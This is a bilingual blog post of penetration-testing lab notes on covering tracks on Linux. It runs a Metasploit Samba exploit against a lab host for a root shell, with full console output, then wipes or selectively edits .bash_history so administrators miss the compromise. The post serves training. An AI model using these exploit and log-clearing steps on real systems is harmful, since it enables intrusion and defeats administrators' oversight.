Clearing Your Tracks On Linux

Posted by r3kind1e on July 23, 2023

Clearing Your Tracks On Linux(在Linux上清除您的痕迹)

Demo: Clearing Your Tracks On Linux(演示:在Linux上清除您的痕迹)

If you are transferring files onto a Linux target system, transfer them into the /tmp directory. Furthermore, if you are utilizing the Metasploit Framework for exploitation and post exploitation, do keep your eye on the artifacts that are generated by those modules and identify where those artifacts are stored in the event that a Metasploit exploit module or post exploitation module provides you with a clean up resource script. Do note down where that resource script is stored, so that when you approach the final phase of post exploitation, you know where it’s located and you can use it and run it on the target system in order to undo what you did or to undo what that particular post exploitation or exploit module did.

Kali Linux : 192.143.174.2

Target IP Address : 192.143.174.3

1
nmap -sV -p 445 192.143.174.3
1
2
3
4
5
6
msfconsole -q
setg RHOSTS 192.143.174.3
search samba
use exploit/linux/samba/is_known_pipename
show options
exploit

This should provide us with a non-interactive command shell session, which we can then upgrade to a semi-interactive bash session.

1
/bin/bash -i

In this case, we gain access to the target system with root privileges, which means we do not need to elevate our privileges.

Now that that is done, we can explore the first guideline or best practice, and that is whenever you are transferring files onto a Linux system, always store them within a centralized directory, and the best directory is always the /tmp directory in the case of Linux.

1
2
3
4
5
6
cd ~
ls
cd /
ls -al
cd /tmp
ls

Do keep in mind that the /tmp directory is exactly that on both Windows and Linux, in that once the system is restarted, all files within the /tmp directory will be deleted. While I do encourage you to transfer files to the /tmp directory, be aware of the fact that if you are performing a penetration test over a couple of days to a couple of weeks then whatever files you have transferred into the /tmp directory will be deleted once the system is rebooted, so do keep that in mind and that’s also another good thing because no traces or artifacts that you have utilize or you’ve transferred over to the target system can be found.

If we wanted to upload a file to this directory, we could either through the manual technique of setting up a web server and utilizing the wget utility or we can upgrade this command shell session into a meterpreter session and upload files directly using the upload command that meterpreter provides to us.

The next is going to be the Metasploit Framework exploit and post exploitation modules and the artifacts that they generate. What I wanted to point out is that most of these modules will generate quite a few artifacts and in the case of Linux there may be an issue with cleaning them up, so you may need to clean them up manually instead of relying on the resource scripts.

Let’s talk about Linux specific techniques. One of cool things with Linux

1
2
3
cd ~
ls
ls -al

.bashrc 是一个在 Unix 和类 Unix 系统中使用的特定文件名,用于配置 Bash shell 的行为和环境变量。Bash(Bourne Again SHell)是许多 Linux 和 macOS 系统中默认的命令行 shell。

当用户登录到一个 Bash shell 时,.bashrc 文件会被执行,它包含一系列的 Bash 命令和设置,用于自定义用户的 shell 环境。这些设置可以包括自定义命令别名、环境变量、路径设置、函数定义等。用户可以在 .bashrc 文件中添加自己想要的个性化配置,以便在每次打开终端时都生效。

请注意,文件名以点号(.)开头的文件通常在文件系统中被视为隐藏文件,这意味着它们在默认情况下不会显示在文件浏览器中。要查看或编辑 .bashrc 文件,您可以在终端中使用文本编辑器(如 nanovimgedit)进行操作。

以下是一个简单的 .bashrc 文件的示例,其中包含一些常见的配置:

1
2
3
4
5
6
7
8
9
10
11
# 设置自定义命令别名
alias ll='ls -alF'
alias c='clear'

# 设置环境变量
export JAVA_HOME=/path/to/java
export PATH=$JAVA_HOME/bin:$PATH
export EDITOR=nano
 
# 自定义提示符
PS1="\[\e[32m\]\u@\h:\w\$\[\e[0m\] "

这只是一个简单的示例,.bashrc 文件可以根据个人需求进行更复杂的设置和配置。重要的是在修改 .bashrc 文件之前,要确保了解每个设置的含义和影响,以免造成意外的问题。

.bashrc is a specific filename used in Unix and Unix-like systems to configure the behavior and environment variables of the Bash shell. Bash (Bourne Again SHell) is the default command-line shell for many Linux and macOS systems.

When a user logs into a Bash shell, the .bashrc file is executed. It contains a series of Bash commands and settings used to customize the user’s shell environment. These settings can include custom command aliases, environment variables, path configurations, function definitions, and more. Users can add their personalized configurations to the .bashrc file, ensuring they take effect every time they open a terminal.

It’s worth noting that filenames starting with a dot (.) are typically considered hidden files in the file system, meaning they won’t be displayed by default in file browsers. To view or edit the .bashrc file, you can use a text editor like nano, vim, or gedit within the terminal.

Here’s a simple example of a .bashrc file with some common configurations:

1
2
3
4
5
6
7
8
9
10
11
# Set custom command aliases
alias ll='ls -alF'
alias c='clear'

# Set environment variables
export JAVA_HOME=/path/to/java
export PATH=$JAVA_HOME/bin:$PATH
export EDITOR=nano

# Customize the prompt
PS1="\[\e[32m\]\u@\h:\w\$\[\e[0m\] "

This is just a basic example, and .bashrc files can be much more complex with a wide range of settings and configurations tailored to individual needs. It’s important to understand the purpose and implications of each setting before modifying the .bashrc file to avoid any unintended issues.

“Tailored to” 是一个常用的表达,意思是“根据…量身定制”或“适合于…的”。在 .bashrc 文件的上下文中,它表示该文件中的配置是根据个人需求和喜好进行定制的,以满足用户的特定需求和偏好。

换句话说,.bashrc 文件中的设置可以根据每个用户的喜好和使用习惯进行调整,以便让用户在使用 Bash shell 时感觉更加舒适和高效。不同的用户可能有不同的需求,所以他们可以在 .bashrc 文件中添加或修改配置,使其适合他们自己的工作流程和目标。

“Implications” 是指某个行动、决定、事件或情况所可能带来的后果、影响或意义。在上面回答中,”implications” 是在提到修改 .bashrc 文件之前,要了解每个设置的含义和可能产生的影响。

具体来说,当您对 .bashrc 文件进行修改时,每个设置和配置都可能对系统的行为产生影响,可能会影响到您的 shell 环境、命令行操作、脚本执行和其他相关方面。如果您不了解每个设置的含义和作用,可能会导致意外的结果,甚至造成系统不稳定或不正确的行为。

因此,在修改 .bashrc 文件或任何配置文件之前,建议您先仔细阅读文档、参考资料或咨询专业人士,以确保您的修改是合理的、符合预期的,并不会产生不良后果。熟悉每个设置的含义和潜在影响将帮助您做出明智的决策,从而确保您的系统和工作环境保持稳定和有效。

.bashrc, which is a configuration file for bash. it stipulates how bash should work.

在这句话中,”stipulate” 的意思是明确规定或规定具体细节。它强调了 .bashrc 文件对于 Bash 的工作方式所做的明确规定。

换句话说,.bashrc 文件作为一个配置文件,它详细规定了 Bash shell 应该如何运作,包括定义命令别名、设置环境变量、定制提示符等等。通过修改 .bashrc 文件,您可以明确地规定 Bash 的行为和环境,确保在每次登录到 Bash shell 时,您的个性化配置都得到正确应用。

所以,在这个句子中,”stipulate” 强调了 .bashrc 文件对于 Bash 的设置和行为的具体规定作用。

On most Linux systems you will typically find a bash history file .bash_history. That file stores a history of all commands that you’ve typed into bash from whenever the system was installed. And this can be limited or customized to only display the commands that were written or typed in over the last week or one month. And this is typically used by system administrator as a security mechanism to see what users have been doing. Every user account within their home directory has a bash history file.

1
2
cat /etc/passwd
uname -r

You can access or view the history of commands that you’ve typed in for the root user within your current session.

1
history

It displays a list of commands that I’ve entered chronologically from the time I logged in.

history 是一个用于显示当前用户在 Bash shell 中执行过的命令历史的命令。它可以显示用户执行过的所有命令,每个命令对应一个序号,从最早执行的命令开始递增。

当您在终端中输入 history 并按下回车键时,Bash shell 将显示一个按照时间顺序排列的命令历史列表。通常,这些命令历史存储在一个特定的历史文件中(通常是用户主目录下的 .bash_history 文件),并在每次用户退出登录时自动保存,以便在下次登录时仍然可用。

示例输出可能类似于以下内容:

1
2
3
4
5
6
7
  1  ls
  2  cd Documents
  3  touch file.txt
  4  cp file.txt backup/
  5  cat file.txt
  6  nano script.sh
  ...

在这个例子中,用户在过去执行了一系列命令,并在每个命令前面有一个编号。这些编号可以用于通过 !(感叹号)来执行特定的历史命令。例如,如果您想重新执行编号为 3 的命令(touch file.txt),可以使用以下命令:

1
!3

这将立即执行编号为 3 的命令,无需重新输入。history 命令对于回顾之前执行的命令,查找特定命令或重新执行以前的命令非常有用。它可以帮助用户在使用命令行时更加高效和方便。

The history command is used to display the command history of the current user in a Bash shell. It shows a list of previously executed commands, each with a corresponding number, starting from the earliest command executed and incrementing with each subsequent command.

When you enter history in the terminal and press the Enter key, the Bash shell will display a list of command history in chronological order. Typically, these command histories are stored in a specific history file (often named .bash_history) located in the user’s home directory. The history is automatically saved to this file each time the user logs out, so it is available for future sessions.

The output might look something like this:

1
2
3
4
5
6
7
  1  ls
  2  cd Documents
  3  touch file.txt
  4  cp file.txt backup/
  5  cat file.txt
  6  nano script.sh
  ...

In this example, the user executed a series of commands in the past, and each command is preceded by a number. These numbers can be used with the ! (exclamation mark) to execute specific historical commands. For instance, if you want to re-execute the command with number 3 (touch file.txt), you can use the following command:

1
!3

This will immediately execute the command with number 3 without having to retype it. The history command is useful for reviewing previously executed commands, finding specific commands in history, or re-executing past commands efficiently. It can be a helpful tool for users to navigate and optimize their command-line experience.

“Chronological” 是一个形容词,指的是按照时间顺序排列的、按照事件发生的先后进行的。在上面的回答中,”chronological order” 指的是按照命令执行的时间顺序进行排列。

当我们说 “command history in chronological order” 时,意思是以命令执行的时间先后顺序,按照从最早执行到最近执行的顺序,来显示命令历史记录。这样的排序方式让用户可以清楚地看到命令的执行顺序,帮助回顾过去的操作或查找特定的命令。

“Preceded” 是 “precede” 这个动词的过去式和过去分词形式。”Precede” 的意思是在某事物之前发生或出现,或者在某物之前位置上。

在上面的回答中,”preceded” 指的是在每个命令前面加上了一个编号,使其在历史记录中出现在更早的位置。每个命令在显示时都是在其编号之前,即按照编号顺序逐个显示。这样的编号就是命令在历史记录中的顺序,让用户可以根据编号快速找到和执行特定的历史命令。

1
ls -al

A good measure or rather technique to use and this is not important in the context of a pentest is to delete specific commands from the bash history file that you typed in or that may indicate to an administrator that the system has been compromised.

Instead of deleting the contents of the bash history file. I would always recommend that you delete the specific commands that you typed in that way it doesn’t look like someone has cleared it up.

1
2
nano
vim
1
2
3
4
5
touch .bash_history
ls -al
history
echo "1 cd /tmp" > .bash_history
cat .bash_histroy

There’s two ways of clearing the bash history. You can go in and delete individual lines or commands that you typed in or you can type in the history -c command to clear the history.

1
history -c

history -c 是一个在 Bash shell 中使用的命令,它用于清除命令历史记录。

当您在终端中输入 history -c 并按下回车键时,Bash shell 将会立即清空当前用户的命令历史记录,从而删除之前执行过的所有命令记录。这意味着在执行这个命令后,您将无法通过 history 命令来查看或重新执行之前输入的命令。

请注意,history -c 命令只会清除当前 Bash 会话的命令历史,它不会影响到之前保存在历史文件中的记录。历史文件通常保存在用户的主目录下的 .bash_history 文件中,而 history -c 只会影响当前会话的历史,不会删除或修改这个文件。

使用 history -c 可以在一些情况下很有用,例如,当您希望在离开或共享计算机前清除敏感命令记录,或者当您需要在某些特定场景下确保不留下任何命令历史时。但是,请谨慎使用此命令,因为一旦历史记录被清除,您将无法恢复之前的执行历史。

The command history -c is used in a Bash shell to clear the command history.

When you enter history -c in the terminal and press the Enter key, the Bash shell will immediately clear the command history for the current user. This means that all previously executed commands will be removed from the history, and you won’t be able to view or re-execute them using the history command.

It’s essential to understand that history -c only clears the command history for the current session. It does not affect any history file where command history is typically stored (such as the .bash_history file in the user’s home directory). The command history file will remain intact, and any new commands executed after running history -c will still be saved to the history file.

It’s important to use history -c with caution because once the history is cleared, there’s no way to recover the previously executed commands. This command can be helpful in certain situations, such as when you want to clear the history before leaving a shared computer to remove any sensitive information from being visible in the history. However, it’s generally not recommended to use this command frequently, as having a command history can be beneficial for recalling and reusing previously executed commands.

1
history
1
2
3
ls -al
cat /etc/passwd
history
1
2
3
4
5
exit
exit
exploit
/bin/bash -i
history
1
2
3
4
5
6
history -c
exit
exit
exploit
/bin/bash -i
history
1
2
3
cd /root
ls -al
cat .bash_history
1
cat /dev/null > .bash_history

该命令的目的是清空用户的 Bash 命令历史记录文件(通常是 .bash_history 文件)。

解释该命令的步骤如下:

  1. cat: 这是一个用于将文件内容输出到终端或其他文件的命令。在这个命令中,cat 命令用于处理 .bash_history 文件。

  2. /dev/null: 在 Unix 和类 Unix 系统中,/dev/null 是一个特殊的设备文件,它会丢弃所有写入它的数据,而不做任何处理。将数据写入 /dev/null 相当于将数据丢弃,不保存它们。

  3. >: 这是重定向操作符,用于将命令的输出重定向到指定的文件。在这里,它的作用是将 /dev/null 中的数据重定向到 .bash_history 文件中。

综合以上步骤,cat /dev/null > .bash_history 的含义是:将 /dev/null 中的数据写入 .bash_history 文件,即将空数据写入 .bash_history 文件,从而清空 .bash_history 文件中的内容。

这个命令执行后,.bash_history 文件将变为空文件,所有以前记录的命令历史将被清除。请注意,这个命令只会清空 .bash_history 文件,而不会影响当前 Bash 会话中的命令历史。新执行的命令仍会添加到 .bash_history 文件中,除非再次使用该命令清空历史。

The command cat /dev/null > .bash_history is used to clear the contents of the user’s Bash command history file (typically named .bash_history).

Let’s break down the command:

  1. cat: This is a command used to concatenate and display the contents of a file. In this command, cat is used to process the .bash_history file.

  2. /dev/null: In Unix and Unix-like systems, /dev/null is a special device file that discards all data written to it without doing anything with the data. Writing data to /dev/null is equivalent to discarding the data, and it won’t be saved anywhere.

  3. >: This is the output redirection operator, used to redirect the output of a command to a file. In this context, it redirects the output from /dev/null to the .bash_history file.

Putting it all together, the command cat /dev/null > .bash_history means: take the data from /dev/null (which is empty), and write it to the .bash_history file, effectively clearing the contents of .bash_history.

After executing this command, the .bash_history file will be empty, and all previously recorded command history will be removed. It’s important to note that this command only clears the .bash_history file; it does not affect the current Bash session’s command history. Any new commands executed after running this command will still be added to the .bash_history file unless you run the command again to clear it once more.

Please exercise caution while using this command because once executed, the command history will be permanently cleared, and there’s no way to recover the previously recorded commands unless you have a backup of the .bash_history file.

在上面的回答中,”concatenate” 是一个动词,它的意思是将多个物体或元素连接在一起形成一个整体。在计算机术语中,”concatenate” 经常用于指将多个文本字符串或文件内容合并在一起,形成一个较长的字符串或文件。

在上面的命令 cat /dev/null > .bash_history 中,cat 命令的本意是用于连接和显示文件内容,然而在这里 /dev/null 是一个特殊的设备文件,它并没有实际的内容。将 /dev/null 作为输入文件用于 cat 命令实际上是为了得到一个空内容,然后再通过输出重定向(>)操作将这个空内容写入 .bash_history 文件,从而实现清空命令历史记录的目的。

总结起来,”concatenate” 在这个上下文中表示将一个空内容连接到 .bash_history 文件中,达到清空命令历史记录的效果。

在上述回答中,”discard” 是一个动词,它的意思是丢弃或放弃某物,意味着不再使用或保留。在计算机术语中,”discard” 通常用于指将数据或信息删除、丢弃或不再处理。

在上面的命令 cat /dev/null > .bash_history 中,我们使用 /dev/null 作为输入文件,因为 /dev/null 是一个特殊设备文件,写入它的数据会被直接丢弃,不会在系统中保留或处理。所以,可以说这个命令是将数据(空内容)写入 /dev/null 这个设备文件,从而实现了将数据丢弃的效果。

因此,在这个命令中,”discard” 指的是将 .bash_history 文件中的命令历史记录丢弃或清除,使其不再保留。通过将空内容写入 .bash_history 文件,我们实现了将之前的命令历史记录丢弃,从而清空了该文件。

1
2
3
history
history -c
history
1
cat .bash_history

That is how to clear the bash history.

Clearing Your Tracks On Linux(清除 Linux 上的痕迹)

Overview(概述)

Goal 目标

This lab covers the process of clearing your tracks on a Linux system. 本实验涵盖了在 Linux 系统上清除痕迹的过程。

复现视频内容

Kali Linux : 192.123.118.2

Target IP Adress : 192.123.118.3

1
2
3
4
5
6
7
8
9
10
11
12
root@attackdefense:~# nmap -sV -p 445 192.123.118.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-07-23 02:49 UTC
Nmap scan report for target-1 (192.123.118.3)
Host is up (0.000060s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:42:C0:7B:76:03 (Unknown)
Service Info: Host: VICTIM-1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@attackdefense:~# msfconsole -q
msf5 > setg RHOSTS 192.123.118.3
RHOSTS => 192.123.118.3
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.123.118.3    yes       The target address range or CIDR identifier
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.123.118.3:445 - Using location \\192.123.118.3\exploitable\tmp for the path
[*] 192.123.118.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.123.118.3:445 - Share 'exploitable' has server-side path '/
[*] 192.123.118.3:445 - Uploaded payload to \\192.123.118.3\exploitable\tmp\aaRuqPMQ.so
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/aaRuqPMQ.so using \\PIPE\/tmp/aaRuqPMQ.so...
[-] 192.123.118.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/aaRuqPMQ.so using /tmp/aaRuqPMQ.so...
[+] 192.123.118.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.123.118.2:38583 -> 192.123.118.3:445) at 2023-07-23 02:51:58 +0000
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# cd ~
cd ~
root@victim-1:/root# ls
ls
start.sh
root@victim-1:/root# cd /
cd /
root@victim-1:/# ls -al
ls -al
total 19164
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 .
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 ..
-rwxr-xr-x   1 root   root           0 Jul 23 02:47 .dockerenv
drwxr-xr-x   1 root   root        4096 Oct  8  2018 bin
drwxr-xr-x   2 root   root        4096 Jun 14  2018 boot
drwxr-xr-x   5 root   root         340 Jul 23 02:47 dev
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 etc
drwxr-xr-x   1 root   root        4096 Oct  8  2018 home
drwxr-xr-x   1 root   root        4096 Oct  8  2018 lib
drwxr-xr-x   2 root   root        4096 Aug 31  2018 lib64
drwxr-xr-x   2 root   root        4096 Aug 31  2018 media
drwxr-xr-x   2 root   root        4096 Aug 31  2018 mnt
drwxr-xr-x   2 root   root        4096 Aug 31  2018 opt
dr-xr-xr-x 643 nobody nogroup        0 Jul 23 02:47 proc
drwx------   1 root   root        4096 Oct  8  2018 root
drwxr-xr-x   1 root   root        4096 Jul 23 02:47 run
drwxr-xr-x   1 root   root        4096 Oct  8  2018 samba-4.1.17
-rw-r--r--   1 root   root    19536407 Feb 23  2015 samba-4.1.17.tar.gz
drwxr-xr-x   1 root   root        4096 Oct  8  2018 sbin
drwxr-xr-x   2 root   root        4096 Aug 31  2018 srv
dr-xr-xr-x  13 nobody nogroup        0 Jul 23 02:47 sys
drwxrwxrwt   1 root   root        4096 Jul 23 02:51 tmp
drwxr-xr-x   1 root   root        4096 Aug 31  2018 usr
drwxr-xr-x   1 root   root        4096 Aug 31  2018 var
root@victim-1:/# cd /tmp
cd /tmp
root@victim-1:/tmp# ls
ls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@victim-1:/tmp# cd ~
cd ~
root@victim-1:/root# ls
ls
start.sh
root@victim-1:/root# ls -al
ls -al
total 32
drwx------ 1 root root 4096 Oct  8  2018 .
drwxr-xr-x 1 root root 4096 Jul 23 02:47 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Oct  8  2018 .docker
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ecryptfs
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ssh
-rwxr-xr-x 1 root root   57 Oct  8  2018 start.sh
1
2
3
4
root@victim-1:/root# cat /etc/passwd
root@victim-1:/root# uname -r
uname -r
5.4.0-152-generic
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@victim-1:/root# history
history
    1  cd ~
    2  ls
    3  cd /
    4  ls -al
    5  cd /tmp
    6  ls
    7  cd ~
    8  ls
    9  ls -al
   10  cat /etc/passwd
   11  uname -r
   12  history
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@victim-1:/root# ls -al
ls -al
total 32
drwx------ 1 root root 4096 Oct  8  2018 .
drwxr-xr-x 1 root root 4096 Jul 23 02:47 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Oct  8  2018 .docker
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ecryptfs
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ssh
-rwxr-xr-x 1 root root   57 Oct  8  2018 start.sh
root@victim-1:/root# touch .bash_history 
touch .bash_history
root@victim-1:/root# ls -al
ls -al
total 32
drwx------ 1 root root 4096 Jul 23 03:12 .
drwxr-xr-x 1 root root 4096 Jul 23 02:47 ..
-rw-rw-rw- 1 root root    0 Jul 23 03:12 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Oct  8  2018 .docker
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ecryptfs
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
drwxr-xr-x 1 root root 4096 Oct  8  2018 .ssh
-rwxr-xr-x 1 root root   57 Oct  8  2018 start.sh
root@victim-1:/root# cat .bash_history
cat .bash_history
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@victim-1:/root# history
history
    1  cd ~
    2  ls
    3  cd /
    4  ls -al
    5  cd /tmp
    6  ls
    7  cd ~
    8  ls
    9  ls -al
   10  cat /etc/passwd
   11  uname -r
   12  history
   13  ls -al
   14  touch .bash_history
   15  ls -al
   16  cat .bash_history
   17  histroy
   18  history
root@victim-1:/root# history -c
history -c
root@victim-1:/root# history
history
    1  history
root@victim-1:/root# cat .bash_history
cat .bash_history
1
2
3
4
5
6
7
8
9
10
11
root@victim-1:/root# ls -al
root@victim-1:/root# cat /etc/passwd
root@victim-1:/root# history
history
    1  history
    2  cat .bash_history
    3  ls -al
    4  cat /etc/passwd
    5  history
root@victim-1:/root# cat .bash_history
cat .bash_history
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@victim-1:/root# ^C
Abort session 1? [y/N]  y
""

[*] 192.123.118.3 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.123.118.3:445 - Using location \\192.123.118.3\exploitable\tmp for the path
[*] 192.123.118.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.123.118.3:445 - Share 'exploitable' has server-side path '/
[*] 192.123.118.3:445 - Uploaded payload to \\192.123.118.3\exploitable\tmp\XTJGWwhn.so
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/XTJGWwhn.so using \\PIPE\/tmp/XTJGWwhn.so...
[-] 192.123.118.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/XTJGWwhn.so using /tmp/XTJGWwhn.so...
[+] 192.123.118.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 2 opened (192.123.118.2:43799 -> 192.123.118.3:445) at 2023-07-23 03:19:38 +0000

/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# history
history
    1  history
    2  cat .bash_history
    3  ls -al
    4  cat /etc/passwd
    5  history
    6  cat .bash_history
    7  history
root@victim-1:/tmp# cd ~ 
cd ~
root@victim-1:/root# cat .bash_history
cat .bash_history
history
cat .bash_history
ls -al
cat /etc/passwd
history
cat .bash_history
1
2
3
4
5
6
7
root@victim-1:/root# history -c
history -c
root@victim-1:/root# exit
exit
exit
exit
[*] 192.123.118.3 - Command shell session 2 closed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.123.118.3:445 - Using location \\192.123.118.3\exploitable\tmp for the path
[*] 192.123.118.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.123.118.3:445 - Share 'exploitable' has server-side path '/
[*] 192.123.118.3:445 - Uploaded payload to \\192.123.118.3\exploitable\tmp\JRaClgTN.so
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/JRaClgTN.so using \\PIPE\/tmp/JRaClgTN.so...
[-] 192.123.118.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.123.118.3:445 - Loading the payload from server-side path /tmp/JRaClgTN.so using /tmp/JRaClgTN.so...
[+] 192.123.118.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 3 opened (192.123.118.2:39651 -> 192.123.118.3:445) at 2023-07-23 03:21:58 +0000

/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# history
history
    1  history
    2  cat .bash_history
    3  ls -al
    4  cat /etc/passwd
    5  history
    6  cat .bash_history
    7  exit
    8  history
root@victim-1:/tmp# cd ~
cd ~
root@victim-1:/root# cat .bash_history
cat .bash_history
history
cat .bash_history
ls -al
cat /etc/passwd
history
cat .bash_history
exit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@victim-1:/root# history -c
history -c
root@victim-1:/root# history
history
    1  history
root@victim-1:/root# cat .bash_history
cat .bash_history
history
cat .bash_history
ls -al
cat /etc/passwd
history
cat .bash_history
exit
1
2
3
4
5
6
7
8
9
10
11
root@victim-1:/root# cat /dev/null > .bash_history
cat /dev/null > .bash_history
root@victim-1:/root# cat .bash_history
cat .bash_history
root@victim-1:/root# history
history
    1  history
    2  cat .bash_history
    3  cat /dev/null > .bash_history
    4  cat .bash_history
    5  history
1
2
3
4
5
6
7
root@victim-1:/root# history -c
history -c
root@victim-1:/root# history
history
    1  history
root@victim-1:/root# cat .bash_history
cat .bash_history